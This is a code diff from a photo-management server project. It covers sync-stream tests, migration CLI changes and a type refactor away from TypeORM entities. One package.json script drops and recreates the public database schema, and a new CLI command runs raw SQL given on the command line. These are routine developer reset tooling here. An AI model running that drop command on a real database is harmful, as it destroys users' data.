|
||||||
|
|
||||||
|
// emit a single event to skip batching and trigger finally
|
||||||
|
responseStreamController.add(
|
||||||
|
utf8.encode(
|
||||||
|
_createJsonLine(
|
||||||
|
SyncEntityType.userDeleteV1.toString(),
|
||||||
|
SyncUserDeleteV1(userId: "user100").toJson(),
|
||||||
|
'ack100',
|
||||||
|
),
|
||||||
|
),
|
||||||
|
);
|
||||||
|
|
||||||
|
await responseStreamController.close();
|
||||||
|
await expectLater(streamChangesFuture, completes);
|
||||||
|
|
||||||
|
expect(onDataCallCount, 1);
|
||||||
|
expect(abortWasCalledInCallback, isTrue);
|
||||||
|
verify(() => mockHttpClient.close()).called(1);
|
||||||
|
},
|
||||||
|
);
|
||||||
|
|
||||||
|
test(
|
||||||
|
'streamChanges processes remaining lines in finally block if not aborted',
|
||||||
|
() async {
|
||||||
|
int onDataCallCount = 0;
|
||||||
|
List<SyncEvent> receivedEventsBatch1 = [];
|
||||||
|
List<SyncEvent> receivedEventsBatch2 = [];
|
||||||
|
|
||||||
|
onDataCallback(List<SyncEvent> events, Function() _) {
|
||||||
|
onDataCallCount++;
|
||||||
|
if (onDataCallCount == 1) {
|
||||||
|
receivedEventsBatch1 = events;
|
||||||
|
} else if (onDataCallCount == 2) {
|
||||||
|
receivedEventsBatch2 = events;
|
||||||
|
} else {
|
||||||
|
fail("onData called more than expected");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
final streamChangesFuture = streamChanges(onDataCallback);
|
||||||
|
|
||||||
|
await pumpEventQueue();
|
||||||
|
|
||||||
|
// Batch 1
|
||||||
|
for (int i = 0; i < testBatchSize; i++) {
|
||||||
|
responseStreamController.add(
|
||||||
|
utf8.encode(
|
||||||
|
_createJsonLine(
|
||||||
|
SyncEntityType.userDeleteV1.toString(),
|
||||||
|
SyncUserDeleteV1(userId: "user$i").toJson(),
|
||||||
|
'ack$i',
|
||||||
|
),
|
||||||
|
),
|
||||||
|
);
|
||||||
|
}
|
||||||
|
|
||||||
|
// Partial Batch 2
|
||||||
|
responseStreamController.add(
|
||||||
|
utf8.encode(
|
||||||
|
_createJsonLine(
|
||||||
|
SyncEntityType.userDeleteV1.toString(),
|
||||||
|
SyncUserDeleteV1(userId: "user100").toJson(),
|
||||||
|
'ack100',
|
||||||
|
),
|
||||||
|
),
|
||||||
|
);
|
||||||
|
|
||||||
|
await responseStreamController.close();
|
||||||
|
await expectLater(streamChangesFuture, completes);
|
||||||
|
|
||||||
|
expect(onDataCallCount, 2);
|
||||||
|
expect(receivedEventsBatch1.length, testBatchSize);
|
||||||
|
expect(receivedEventsBatch2.length, 1);
|
||||||
|
verify(() => mockHttpClient.close()).called(1);
|
||||||
|
},
|
||||||
|
);
|
||||||
|
|
||||||
|
test('streamChanges handles stream error gracefully', () async {
|
||||||
|
final streamError = Exception("Network Error");
|
||||||
|
int onDataCallCount = 0;
|
||||||
|
|
||||||
|
onDataCallback(List<SyncEvent> events, Function() _) {
|
||||||
|
onDataCallCount++;
|
||||||
|
}
|
||||||
|
|
||||||
|
final streamChangesFuture = streamChanges(onDataCallback);
|
||||||
|
|
||||||
|
await pumpEventQueue();
|
||||||
|
|
||||||
|
responseStreamController.add(
|
||||||
|
utf8.encode(
|
||||||
|
_createJsonLine(
|
||||||
|
SyncEntityType.userDeleteV1.toString(),
|
||||||
|
SyncUserDeleteV1(userId: "user1").toJson(),
|
||||||
|
'ack1',
|
||||||
|
),
|
||||||
|
),
|
||||||
|
);
|
||||||
|
|
||||||
|
responseStreamController.addError(streamError);
|
||||||
|
await expectLater(streamChangesFuture, throwsA(streamError));
|
||||||
|
|
||||||
|
expect(onDataCallCount, 0);
|
||||||
|
verify(() => mockHttpClient.close()).called(1);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('streamChanges throws ApiException on non-200 status code', () async {
|
||||||
|
when(() => mockStreamedResponse.statusCode).thenReturn(401);
|
||||||
|
final errorBodyController = StreamController<List<int>>(sync: true);
|
||||||
|
when(() => mockStreamedResponse.stream)
|
||||||
|
.thenAnswer((_) => http.ByteStream(errorBodyController.stream));
|
||||||
|
|
||||||
|
int onDataCallCount = 0;
|
||||||
|
|
||||||
|
onDataCallback(List<SyncEvent> events, Function() _) {
|
||||||
|
onDataCallCount++;
|
||||||
|
}
|
||||||
|
|
||||||
|
final future = streamChanges(onDataCallback);
|
||||||
|
|
||||||
|
errorBodyController.add(utf8.encode('{"error":"Unauthorized"}'));
|
||||||
|
await errorBodyController.close();
|
||||||
|
|
||||||
|
await expectLater(
|
||||||
|
future,
|
||||||
|
throwsA(
|
||||||
|
isA<ApiException>()
|
||||||
|
.having((e) => e.code, 'code', 401)
|
||||||
|
.having((e) => e.message, 'message', contains('Unauthorized')),
|
||||||
|
),
|
||||||
|
);
|
||||||
|
|
||||||
|
expect(onDataCallCount, 0);
|
||||||
|
verify(() => mockHttpClient.close()).called(1);
|
||||||
|
});
|
||||||
|
}
|
@ -26,9 +26,8 @@
|
|||||||
"migrations:generate": "node ./dist/bin/migrations.js generate",
|
"migrations:generate": "node ./dist/bin/migrations.js generate",
|
||||||
"migrations:create": "node ./dist/bin/migrations.js create",
|
"migrations:create": "node ./dist/bin/migrations.js create",
|
||||||
"migrations:run": "node ./dist/bin/migrations.js run",
|
"migrations:run": "node ./dist/bin/migrations.js run",
|
||||||
"typeorm:migrations:revert": "typeorm migration:revert -d ./dist/bin/database.js",
|
"schema:drop": "node ./dist/bin/migrations.js query 'DROP schema public cascade; CREATE schema public;'",
|
||||||
"typeorm:schema:drop": "typeorm query -d ./dist/bin/database.js 'DROP schema public cascade; CREATE schema public;'",
|
"schema:reset": "npm run schema:drop && npm run migrations:run",
|
||||||
"typeorm:schema:reset": "npm run typeorm:schema:drop && npm run migrations:run",
|
|
||||||
"kysely:codegen": "npx kysely-codegen --include-pattern=\"(public|vectors).*\" --dialect postgres --url postgres://postgres:postgres@localhost/immich --log-level debug --out-file=./src/db.d.ts",
|
"kysely:codegen": "npx kysely-codegen --include-pattern=\"(public|vectors).*\" --dialect postgres --url postgres://postgres:postgres@localhost/immich --log-level debug --out-file=./src/db.d.ts",
|
||||||
"sync:open-api": "node ./dist/bin/sync-open-api.js",
|
"sync:open-api": "node ./dist/bin/sync-open-api.js",
|
||||||
"sync:sql": "node ./dist/bin/sync-sql.js",
|
"sync:sql": "node ./dist/bin/sync-sql.js",
|
||||||
|
@ -1,11 +0,0 @@
|
|||||||
import { ConfigRepository } from 'src/repositories/config.repository';
|
|
||||||
import { DataSource } from 'typeorm';
|
|
||||||
|
|
||||||
const { database } = new ConfigRepository().getEnv();
|
|
||||||
|
|
||||||
/**
|
|
||||||
* @deprecated - DO NOT USE THIS
|
|
||||||
*
|
|
||||||
* this export is ONLY to be used for TypeORM commands in package.json#scripts
|
|
||||||
*/
|
|
||||||
export const dataSource = new DataSource({ ...database.config.typeorm, host: 'localhost' });
|
|
@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env node
|
#!/usr/bin/env node
|
||||||
process.env.DB_URL = process.env.DB_URL || 'postgres://postgres:postgres@localhost:5432/immich';
|
process.env.DB_URL = process.env.DB_URL || 'postgres://postgres:postgres@localhost:5432/immich';
|
||||||
|
|
||||||
import { Kysely } from 'kysely';
|
import { Kysely, sql } from 'kysely';
|
||||||
import { writeFileSync } from 'node:fs';
|
import { mkdirSync, writeFileSync } from 'node:fs';
|
||||||
import { basename, dirname, extname, join } from 'node:path';
|
import { basename, dirname, extname, join } from 'node:path';
|
||||||
import postgres from 'postgres';
|
import postgres from 'postgres';
|
||||||
import { ConfigRepository } from 'src/repositories/config.repository';
|
import { ConfigRepository } from 'src/repositories/config.repository';
|
||||||
@ -23,8 +23,13 @@ const main = async () => {
|
|||||||
}
|
}
|
||||||
|
|
||||||
case 'run': {
|
case 'run': {
|
||||||
const only = process.argv[3] as 'kysely' | 'typeorm' | undefined;
|
await runMigrations();
|
||||||
await run(only);
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
case 'query': {
|
||||||
|
const query = process.argv[3];
|
||||||
|
await runQuery(query);
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
@ -48,14 +53,25 @@ const main = async () => {
|
|||||||
}
|
}
|
||||||
};
|
};
|
||||||
|
|
||||||
const run = async (only?: 'kysely' | 'typeorm') => {
|
const getDatabaseClient = () => {
|
||||||
const configRepository = new ConfigRepository();
|
const configRepository = new ConfigRepository();
|
||||||
const { database } = configRepository.getEnv();
|
const { database } = configRepository.getEnv();
|
||||||
const logger = new LoggingRepository(undefined, configRepository);
|
return new Kysely<any>(getKyselyConfig(database.config.kysely));
|
||||||
const db = new Kysely<any>(getKyselyConfig(database.config.kysely));
|
};
|
||||||
const databaseRepository = new DatabaseRepository(db, logger, configRepository);
|
|
||||||
|
|
||||||
await databaseRepository.runMigrations({ only });
|
const runQuery = async (query: string) => {
|
||||||
|
const db = getDatabaseClient();
|
||||||
|
await sql.raw(query).execute(db);
|
||||||
|
await db.destroy();
|
||||||
|
};
|
||||||
|
|
||||||
|
const runMigrations = async () => {
|
||||||
|
const configRepository = new ConfigRepository();
|
||||||
|
const logger = new LoggingRepository(undefined, configRepository);
|
||||||
|
const db = getDatabaseClient();
|
||||||
|
const databaseRepository = new DatabaseRepository(db, logger, configRepository);
|
||||||
|
await databaseRepository.runMigrations();
|
||||||
|
await db.destroy();
|
||||||
};
|
};
|
||||||
|
|
||||||
const debug = async () => {
|
const debug = async () => {
|
||||||
@ -81,7 +97,8 @@ const create = (path: string, up: string[], down: string[]) => {
|
|||||||
const filename = `${timestamp}-${name}.ts`;
|
const filename = `${timestamp}-${name}.ts`;
|
||||||
const folder = dirname(path);
|
const folder = dirname(path);
|
||||||
const fullPath = join(folder, filename);
|
const fullPath = join(folder, filename);
|
||||||
writeFileSync(fullPath, asMigration('typeorm', { name, timestamp, up, down }));
|
mkdirSync(folder, { recursive: true });
|
||||||
|
writeFileSync(fullPath, asMigration('kysely', { name, timestamp, up, down }));
|
||||||
console.log(`Wrote ${fullPath}`);
|
console.log(`Wrote ${fullPath}`);
|
||||||
};
|
};
|
||||||
|
|
||||||
|
@ -1,13 +1,13 @@
|
|||||||
import { Selectable } from 'kysely';
|
import { Selectable } from 'kysely';
|
||||||
import { AssetJobStatus as DatabaseAssetJobStatus, Exif as DatabaseExif } from 'src/db';
|
import { Albums, Exif as DatabaseExif } from 'src/db';
|
||||||
import { AssetEntity } from 'src/entities/asset.entity';
|
import { MapAsset } from 'src/dtos/asset-response.dto';
|
||||||
import {
|
import {
|
||||||
AlbumUserRole,
|
AlbumUserRole,
|
||||||
AssetFileType,
|
AssetFileType,
|
||||||
AssetStatus,
|
|
||||||
AssetType,
|
AssetType,
|
||||||
MemoryType,
|
MemoryType,
|
||||||
Permission,
|
Permission,
|
||||||
|
SharedLinkType,
|
||||||
SourceType,
|
SourceType,
|
||||||
UserStatus,
|
UserStatus,
|
||||||
} from 'src/enum';
|
} from 'src/enum';
|
||||||
@ -44,7 +44,7 @@ export type Library = {
|
|||||||
exclusionPatterns: string[];
|
exclusionPatterns: string[];
|
||||||
deletedAt: Date | null;
|
deletedAt: Date | null;
|
||||||
refreshedAt: Date | null;
|
refreshedAt: Date | null;
|
||||||
assets?: Asset[];
|
assets?: MapAsset[];
|
||||||
};
|
};
|
||||||
|
|
||||||
export type AuthApiKey = {
|
export type AuthApiKey = {
|
||||||
@ -96,7 +96,26 @@ export type Memory = {
|
|||||||
data: OnThisDayData;
|
data: OnThisDayData;
|
||||||
ownerId: string;
|
ownerId: string;
|
||||||
isSaved: boolean;
|
isSaved: boolean;
|
||||||
assets: Asset[];
|
assets: MapAsset[];
|
||||||
|
};
|
||||||
|
|
||||||
|
export type Asset = {
|
||||||
|
id: string;
|
||||||
|
checksum: Buffer<ArrayBufferLike>;
|
||||||
|
deviceAssetId: string;
|
||||||
|
deviceId: string;
|
||||||
|
fileCreatedAt: Date;
|
||||||
|
fileModifiedAt: Date;
|
||||||
|
isExternal: boolean;
|
||||||
|
isVisible: boolean;
|
||||||
|
libraryId: string | null;
|
||||||
|
livePhotoVideoId: string | null;
|
||||||
|
localDateTime: Date;
|
||||||
|
originalFileName: string;
|
||||||
|
originalPath: string;
|
||||||
|
ownerId: string;
|
||||||
|
sidecarPath: string | null;
|
||||||
|
type: AssetType;
|
||||||
};
|
};
|
||||||
|
|
||||||
export type User = {
|
export type User = {
|
||||||
@ -128,39 +147,6 @@ export type StorageAsset = {
|
|||||||
encodedVideoPath: string | null;
|
encodedVideoPath: string | null;
|
||||||
};
|
};
|
||||||
|
|
||||||
export type Asset = {
|
|
||||||
createdAt: Date;
|
|
||||||
updatedAt: Date;
|
|
||||||
deletedAt: Date | null;
|
|
||||||
id: string;
|
|
||||||
updateId: string;
|
|
||||||
status: AssetStatus;
|
|
||||||
checksum: Buffer<ArrayBufferLike>;
|
|
||||||
deviceAssetId: string;
|
|
||||||
deviceId: string;
|
|
||||||
duplicateId: string | null;
|
|
||||||
duration: string | null;
|
|
||||||
encodedVideoPath: string | null;
|
|
||||||
fileCreatedAt: Date | null;
|
|
||||||
fileModifiedAt: Date | null;
|
|
||||||
isArchived: boolean;
|
|
||||||
isExternal: boolean;
|
|
||||||
isFavorite: boolean;
|
|
||||||
isOffline: boolean;
|
|
||||||
isVisible: boolean;
|
|
||||||
libraryId: string | null;
|
|
||||||
livePhotoVideoId: string | null;
|
|
||||||
localDateTime: Date | null;
|
|
||||||
originalFileName: string;
|
|
||||||
originalPath: string;
|
|
||||||
ownerId: string;
|
|
||||||
sidecarPath: string | null;
|
|
||||||
stack?: Stack | null;
|
|
||||||
stackId: string | null;
|
|
||||||
thumbhash: Buffer<ArrayBufferLike> | null;
|
|
||||||
type: AssetType;
|
|
||||||
};
|
|
||||||
|
|
||||||
export type SidecarWriteAsset = {
|
export type SidecarWriteAsset = {
|
||||||
id: string;
|
id: string;
|
||||||
sidecarPath: string | null;
|
sidecarPath: string | null;
|
||||||
@ -173,7 +159,7 @@ export type Stack = {
|
|||||||
primaryAssetId: string;
|
primaryAssetId: string;
|
||||||
owner?: User;
|
owner?: User;
|
||||||
ownerId: string;
|
ownerId: string;
|
||||||
assets: AssetEntity[];
|
assets: MapAsset[];
|
||||||
assetCount?: number;
|
assetCount?: number;
|
||||||
};
|
};
|
||||||
|
|
||||||
@ -187,6 +173,28 @@ export type AuthSharedLink = {
|
|||||||
password: string | null;
|
password: string | null;
|
||||||
};
|
};
|
||||||
|
|
||||||
|
export type SharedLink = {
|
||||||
|
id: string;
|
||||||
|
album?: Album | null;
|
||||||
|
albumId: string | null;
|
||||||
|
allowDownload: boolean;
|
||||||
|
allowUpload: boolean;
|
||||||
|
assets: MapAsset[];
|
||||||
|
createdAt: Date;
|
||||||
|
description: string | null;
|
||||||
|
expiresAt: Date | null;
|
||||||
|
key: Buffer;
|
||||||
|
password: string | null;
|
||||||
|
showExif: boolean;
|
||||||
|
type: SharedLinkType;
|
||||||
|
userId: string;
|
||||||
|
};
|
||||||
|
|
||||||
|
export type Album = Selectable<Albums> & {
|
||||||
|
owner: User;
|
||||||
|
assets: MapAsset[];
|
||||||
|
};
|
||||||
|
|
||||||
export type AuthSession = {
|
export type AuthSession = {
|
||||||
id: string;
|
id: string;
|
||||||
};
|
};
|
||||||
@ -256,10 +264,6 @@ export type AssetFace = {
|
|||||||
person?: Person | null;
|
person?: Person | null;
|
||||||
};
|
};
|
||||||
|
|
||||||
export type AssetJobStatus = Selectable<DatabaseAssetJobStatus> & {
|
|
||||||
asset: AssetEntity;
|
|
||||||
};
|
|
||||||
|
|
||||||
const userColumns = ['id', 'name', 'email', 'profileImagePath', 'profileChangedAt'] as const;
|
const userColumns = ['id', 'name', 'email', 'profileImagePath', 'profileChangedAt'] as const;
|
||||||
|
|
||||||
export const columns = {
|
export const columns = {
|
||||||
|
6
server/src/db.d.ts
vendored
6
server/src/db.d.ts
vendored
@ -143,8 +143,8 @@ export interface Assets {
|
|||||||
duplicateId: string | null;
|
duplicateId: string | null;
|
||||||
duration: string | null;
|
duration: string | null;
|
||||||
encodedVideoPath: Generated<string | null>;
|
encodedVideoPath: Generated<string | null>;
|
||||||
fileCreatedAt: Timestamp | null;
|
fileCreatedAt: Timestamp;
|
||||||
fileModifiedAt: Timestamp | null;
|
fileModifiedAt: Timestamp;
|
||||||
id: Generated<string>;
|
id: Generated<string>;
|
||||||
isArchived: Generated<boolean>;
|
isArchived: Generated<boolean>;
|
||||||
isExternal: Generated<boolean>;
|
isExternal: Generated<boolean>;
|
||||||
@ -153,7 +153,7 @@ export interface Assets {
|
|||||||
isVisible: Generated<boolean>;
|
isVisible: Generated<boolean>;
|
||||||
libraryId: string | null;
|
libraryId: string | null;
|
||||||
livePhotoVideoId: string | null;
|
livePhotoVideoId: string | null;
|
||||||
localDateTime: Timestamp | null;
|
localDateTime: Timestamp;
|
||||||
originalFileName: string;
|
originalFileName: string;
|
||||||
originalPath: string;
|
originalPath: string;
|
||||||
ownerId: string;
|
ownerId: string;
|
||||||
|
@ -2,10 +2,10 @@ import { ApiProperty } from '@nestjs/swagger';
|
|||||||
import { Type } from 'class-transformer';
|
import { Type } from 'class-transformer';
|
||||||
import { ArrayNotEmpty, IsArray, IsEnum, IsString, ValidateNested } from 'class-validator';
|
import { ArrayNotEmpty, IsArray, IsEnum, IsString, ValidateNested } from 'class-validator';
|
||||||
import _ from 'lodash';
|
import _ from 'lodash';
|
||||||
import { AssetResponseDto, mapAsset } from 'src/dtos/asset-response.dto';
|
import { AlbumUser, AuthSharedLink, User } from 'src/database';
|
||||||
|
import { AssetResponseDto, MapAsset, mapAsset } from 'src/dtos/asset-response.dto';
|
||||||
import { AuthDto } from 'src/dtos/auth.dto';
|
import { AuthDto } from 'src/dtos/auth.dto';
|
||||||
import { UserResponseDto, mapUser } from 'src/dtos/user.dto';
|
import { UserResponseDto, mapUser } from 'src/dtos/user.dto';
|
||||||
import { AlbumEntity } from 'src/entities/album.entity';
|
|
||||||
import { AlbumUserRole, AssetOrder } from 'src/enum';
|
import { AlbumUserRole, AssetOrder } from 'src/enum';
|
||||||
import { Optional, ValidateBoolean, ValidateUUID } from 'src/validation';
|
import { Optional, ValidateBoolean, ValidateUUID } from 'src/validation';
|
||||||
|
|
||||||
@ -142,7 +142,23 @@ export class AlbumResponseDto {
|
|||||||
order?: AssetOrder;
|
order?: AssetOrder;
|
||||||
}
|
}
|
||||||
|
|
||||||
export const mapAlbum = (entity: AlbumEntity, withAssets: boolean, auth?: AuthDto): AlbumResponseDto => {
|
export type MapAlbumDto = {
|
||||||
|
albumUsers?: AlbumUser[];
|
||||||
|
assets?: MapAsset[];
|
||||||
|
sharedLinks?: AuthSharedLink[];
|
||||||
|
albumName: string;
|
||||||
|
description: string;
|
||||||
|
albumThumbnailAssetId: string | null;
|
||||||
|
createdAt: Date;
|
||||||
|
updatedAt: Date;
|
||||||
|
id: string;
|
||||||
|
ownerId: string;
|
||||||
|
owner: User;
|
||||||
|
isActivityEnabled: boolean;
|
||||||
|
order: AssetOrder;
|
||||||
|
};
|
||||||
|
|
||||||
|
export const mapAlbum = (entity: MapAlbumDto, withAssets: boolean, auth?: AuthDto): AlbumResponseDto => {
|
||||||
const albumUsers: AlbumUserResponseDto[] = [];
|
const albumUsers: AlbumUserResponseDto[] = [];
|
||||||
|
|
||||||
if (entity.albumUsers) {
|
if (entity.albumUsers) {
|
||||||
@ -159,7 +175,7 @@ export const mapAlbum = (entity: AlbumEntity, withAssets: boolean, auth?: AuthDt
|
|||||||
|
|
||||||
const assets = entity.assets || [];
|
const assets = entity.assets || [];
|
||||||
|
|
||||||
const hasSharedLink = entity.sharedLinks?.length > 0;
|
const hasSharedLink = !!entity.sharedLinks && entity.sharedLinks.length > 0;
|
||||||
const hasSharedUser = albumUsers.length > 0;
|
const hasSharedUser = albumUsers.length > 0;
|
||||||
|
|
||||||
let startDate = assets.at(0)?.localDateTime;
|
let startDate = assets.at(0)?.localDateTime;
|
||||||
@ -190,5 +206,5 @@ export const mapAlbum = (entity: AlbumEntity, withAssets: boolean, auth?: AuthDt
|
|||||||
};
|
};
|
||||||
};
|
};
|
||||||
|
|
||||||
export const mapAlbumWithAssets = (entity: AlbumEntity) => mapAlbum(entity, true);
|
export const mapAlbumWithAssets = (entity: MapAlbumDto) => mapAlbum(entity, true);
|
||||||
export const mapAlbumWithoutAssets = (entity: AlbumEntity) => mapAlbum(entity, false);
|
export const mapAlbumWithoutAssets = (entity: MapAlbumDto) => mapAlbum(entity, false);
|
||||||
|
@ -1,5 +1,6 @@
|
|||||||
import { ApiProperty } from '@nestjs/swagger';
|
import { ApiProperty } from '@nestjs/swagger';
|
||||||
import { AssetFace } from 'src/database';
|
import { Selectable } from 'kysely';
|
||||||
|
import { AssetFace, AssetFile, Exif, Stack, Tag, User } from 'src/database';
|
||||||
import { PropertyLifecycle } from 'src/decorators';
|
import { PropertyLifecycle } from 'src/decorators';
|
||||||
import { AuthDto } from 'src/dtos/auth.dto';
|
import { AuthDto } from 'src/dtos/auth.dto';
|
||||||
import { ExifResponseDto, mapExif } from 'src/dtos/exif.dto';
|
import { ExifResponseDto, mapExif } from 'src/dtos/exif.dto';
|
||||||
@ -11,8 +12,7 @@ import {
|
|||||||
} from 'src/dtos/person.dto';
|
} from 'src/dtos/person.dto';
|
||||||
import { TagResponseDto, mapTag } from 'src/dtos/tag.dto';
|
import { TagResponseDto, mapTag } from 'src/dtos/tag.dto';
|
||||||
import { UserResponseDto, mapUser } from 'src/dtos/user.dto';
|
import { UserResponseDto, mapUser } from 'src/dtos/user.dto';
|
||||||
import { AssetEntity } from 'src/entities/asset.entity';
|
import { AssetStatus, AssetType } from 'src/enum';
|
||||||
import { AssetType } from 'src/enum';
|
|
||||||
import { mimeTypes } from 'src/utils/mime-types';
|
import { mimeTypes } from 'src/utils/mime-types';
|
||||||
|
|
||||||
export class SanitizedAssetResponseDto {
|
export class SanitizedAssetResponseDto {
|
||||||
@ -56,6 +56,44 @@ export class AssetResponseDto extends SanitizedAssetResponseDto {
|
|||||||
resized?: boolean;
|
resized?: boolean;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
export type MapAsset = {
|
||||||
|
createdAt: Date;
|
||||||
|
updatedAt: Date;
|
||||||
|
deletedAt: Date | null;
|
||||||
|
id: string;
|
||||||
|
updateId: string;
|
||||||
|
status: AssetStatus;
|
||||||
|
checksum: Buffer<ArrayBufferLike>;
|
||||||
|
deviceAssetId: string;
|
||||||
|
deviceId: string;
|
||||||
|
duplicateId: string | null;
|
||||||
|
duration: string | null;
|
||||||
|
encodedVideoPath: string | null;
|
||||||
|
exifInfo?: Selectable<Exif> | null;
|
||||||
|
faces?: AssetFace[];
|
||||||
|
fileCreatedAt: Date;
|
||||||
|
fileModifiedAt: Date;
|
||||||
|
files?: AssetFile[];
|
||||||
|
isArchived: boolean;
|
||||||
|
isExternal: boolean;
|
||||||
|
isFavorite: boolean;
|
||||||
|
isOffline: boolean;
|
||||||
|
isVisible: boolean;
|
||||||
|
libraryId: string | null;
|
||||||
|
livePhotoVideoId: string | null;
|
||||||
|
localDateTime: Date;
|
||||||
|
originalFileName: string;
|
||||||
|
originalPath: string;
|
||||||
|
owner?: User | null;
|
||||||
|
ownerId: string;
|
||||||
|
sidecarPath: string | null;
|
||||||
|
stack?: Stack | null;
|
||||||
|
stackId: string | null;
|
||||||
|
tags?: Tag[];
|
||||||
|
thumbhash: Buffer<ArrayBufferLike> | null;
|
||||||
|
type: AssetType;
|
||||||
|
};
|
||||||
|
|
||||||
export class AssetStackResponseDto {
|
export class AssetStackResponseDto {
|
||||||
id!: string;
|
id!: string;
|
||||||
|
|
||||||
@ -72,7 +110,7 @@ export type AssetMapOptions = {
|
|||||||
};
|
};
|
||||||
|
|
||||||
// TODO: this is inefficient
|
// TODO: this is inefficient
|
||||||
const peopleWithFaces = (faces: AssetFace[]): PersonWithFacesResponseDto[] => {
|
const peopleWithFaces = (faces?: AssetFace[]): PersonWithFacesResponseDto[] => {
|
||||||
const result: PersonWithFacesResponseDto[] = [];
|
const result: PersonWithFacesResponseDto[] = [];
|
||||||
if (faces) {
|
if (faces) {
|
||||||
for (const face of faces) {
|
for (const face of faces) {
|
||||||
@ -90,7 +128,7 @@ const peopleWithFaces = (faces: AssetFace[]): PersonWithFacesResponseDto[] => {
|
|||||||
return result;
|
return result;
|
||||||
};
|
};
|
||||||
|
|
||||||
const mapStack = (entity: AssetEntity) => {
|
const mapStack = (entity: { stack?: Stack | null }) => {
|
||||||
if (!entity.stack) {
|
if (!entity.stack) {
|
||||||
return null;
|
return null;
|
||||||
}
|
}
|
||||||
@ -111,7 +149,7 @@ export const hexOrBufferToBase64 = (encoded: string | Buffer) => {
|
|||||||
return encoded.toString('base64');
|
return encoded.toString('base64');
|
||||||
};
|
};
|
||||||
|
|
||||||
export function mapAsset(entity: AssetEntity, options: AssetMapOptions = {}): AssetResponseDto {
|
export function mapAsset(entity: MapAsset, options: AssetMapOptions = {}): AssetResponseDto {
|
||||||
const { stripMetadata = false, withStack = false } = options;
|
const { stripMetadata = false, withStack = false } = options;
|
||||||
|
|
||||||
if (stripMetadata) {
|
if (stripMetadata) {
|
||||||
|
@ -4,7 +4,6 @@ import { IsEnum, IsInt, IsObject, IsPositive, ValidateNested } from 'class-valid
|
|||||||
import { Memory } from 'src/database';
|
import { Memory } from 'src/database';
|
||||||
import { AssetResponseDto, mapAsset } from 'src/dtos/asset-response.dto';
|
import { AssetResponseDto, mapAsset } from 'src/dtos/asset-response.dto';
|
||||||
import { AuthDto } from 'src/dtos/auth.dto';
|
import { AuthDto } from 'src/dtos/auth.dto';
|
||||||
import { AssetEntity } from 'src/entities/asset.entity';
|
|
||||||
import { MemoryType } from 'src/enum';
|
import { MemoryType } from 'src/enum';
|
||||||
import { Optional, ValidateBoolean, ValidateDate, ValidateUUID } from 'src/validation';
|
import { Optional, ValidateBoolean, ValidateDate, ValidateUUID } from 'src/validation';
|
||||||
|
|
||||||
@ -103,6 +102,6 @@ export const mapMemory = (entity: Memory, auth: AuthDto): MemoryResponseDto => {
|
|||||||
type: entity.type as MemoryType,
|
type: entity.type as MemoryType,
|
||||||
data: entity.data as unknown as MemoryData,
|
data: entity.data as unknown as MemoryData,
|
||||||
isSaved: entity.isSaved,
|
isSaved: entity.isSaved,
|
||||||
assets: ('assets' in entity ? entity.assets : []).map((asset) => mapAsset(asset as AssetEntity, { auth })),
|
assets: ('assets' in entity ? entity.assets : []).map((asset) => mapAsset(asset, { auth })),
|
||||||
};
|
};
|
||||||
};
|
};
|
||||||
|
@ -1,9 +1,9 @@
|
|||||||
import { ApiProperty } from '@nestjs/swagger';
|
import { ApiProperty } from '@nestjs/swagger';
|
||||||
import { IsEnum, IsString } from 'class-validator';
|
import { IsEnum, IsString } from 'class-validator';
|
||||||
import _ from 'lodash';
|
import _ from 'lodash';
|
||||||
|
import { SharedLink } from 'src/database';
|
||||||
import { AlbumResponseDto, mapAlbumWithoutAssets } from 'src/dtos/album.dto';
|
import { AlbumResponseDto, mapAlbumWithoutAssets } from 'src/dtos/album.dto';
|
||||||
import { AssetResponseDto, mapAsset } from 'src/dtos/asset-response.dto';
|
import { AssetResponseDto, mapAsset } from 'src/dtos/asset-response.dto';
|
||||||
import { SharedLinkEntity } from 'src/entities/shared-link.entity';
|
|
||||||
import { SharedLinkType } from 'src/enum';
|
import { SharedLinkType } from 'src/enum';
|
||||||
import { Optional, ValidateBoolean, ValidateDate, ValidateUUID } from 'src/validation';
|
import { Optional, ValidateBoolean, ValidateDate, ValidateUUID } from 'src/validation';
|
||||||
|
|
||||||
@ -102,7 +102,7 @@ export class SharedLinkResponseDto {
|
|||||||
showMetadata!: boolean;
|
showMetadata!: boolean;
|
||||||
}
|
}
|
||||||
|
|
||||||
export function mapSharedLink(sharedLink: SharedLinkEntity): SharedLinkResponseDto {
|
export function mapSharedLink(sharedLink: SharedLink): SharedLinkResponseDto {
|
||||||
const linkAssets = sharedLink.assets || [];
|
const linkAssets = sharedLink.assets || [];
|
||||||
|
|
||||||
return {
|
return {
|
||||||
@ -122,7 +122,7 @@ export function mapSharedLink(sharedLink: SharedLinkEntity): SharedLinkResponseD
|
|||||||
};
|
};
|
||||||
}
|
}
|
||||||
|
|
||||||
export function mapSharedLinkWithoutMetadata(sharedLink: SharedLinkEntity): SharedLinkResponseDto {
|
export function mapSharedLinkWithoutMetadata(sharedLink: SharedLink): SharedLinkResponseDto {
|
||||||
const linkAssets = sharedLink.assets || [];
|
const linkAssets = sharedLink.assets || [];
|
||||||
const albumAssets = (sharedLink?.album?.assets || []).map((asset) => asset);
|
const albumAssets = (sharedLink?.album?.assets || []).map((asset) => asset);
|
||||||
|
|
||||||
@ -137,7 +137,7 @@ export function mapSharedLinkWithoutMetadata(sharedLink: SharedLinkEntity): Shar
|
|||||||
type: sharedLink.type,
|
type: sharedLink.type,
|
||||||
createdAt: sharedLink.createdAt,
|
createdAt: sharedLink.createdAt,
|
||||||
expiresAt: sharedLink.expiresAt,
|
expiresAt: sharedLink.expiresAt,
|
||||||
assets: assets.map((asset) => mapAsset(asset, { stripMetadata: true })) as AssetResponseDto[],
|
assets: assets.map((asset) => mapAsset(asset, { stripMetadata: true })),
|
||||||
album: sharedLink.album ? mapAlbumWithoutAssets(sharedLink.album) : undefined,
|
album: sharedLink.album ? mapAlbumWithoutAssets(sharedLink.album) : undefined,
|
||||||
allowUpload: sharedLink.allowUpload,
|
allowUpload: sharedLink.allowUpload,
|
||||||
allowDownload: sharedLink.allowDownload,
|
allowDownload: sharedLink.allowDownload,
|
||||||
|
@ -1,23 +0,0 @@
|
|||||||
import { AlbumUser, User } from 'src/database';
|
|
